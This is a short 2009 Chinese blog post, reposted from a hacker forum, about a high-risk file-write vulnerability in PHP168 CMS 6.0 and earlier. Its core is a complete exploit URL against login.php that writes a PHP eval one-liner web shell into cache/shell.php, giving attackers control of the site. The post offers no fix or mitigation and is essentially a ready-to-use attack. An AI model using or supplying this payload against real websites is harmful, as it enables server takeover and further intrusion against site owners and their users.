• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
CooKiss's Blog
清风明月听音睡,暗夜游魂梦里寻;折扇花剑天涯走,山人美酒醉方休。
博客园    首页    新随笔    联系   管理    订阅  订阅

PHP168 6.0及以下版本漏洞

最近在研究PHP
那个劲啊,就甭提鸟
———————————
本文引自黑客动画吧

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

出问题的文件
login.php

login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>

写到:cache/shell.php

———————————

posted @ 2009-09-18 15:03  Cookiss  阅读(524)  评论(1)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3